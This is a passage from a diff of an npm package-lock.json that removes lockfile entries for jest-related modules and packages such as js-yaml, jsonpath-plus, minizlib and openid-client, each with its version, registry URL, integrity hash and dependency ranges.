"sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "dependencies": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runner-eslint/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "optional": true, - "peer": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runner-eslint/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", - "engines": { - "node": ">= 10.16.0" - } - }, - "node_modules/jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", - "dev": true, - "peer": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "dependencies": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - }, - "bin": { - "jsonpath": "bin/jsonpath-cli.js", - "jsonpath-plus": "bin/jsonpath-cli.js" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", - "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", - "dev": true, - "peer": true, - "dependencies": { - "p-locate": "^5.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "dependencies": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/minizlib/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/minizlib/node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - }, - "bin": { - "glob": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": 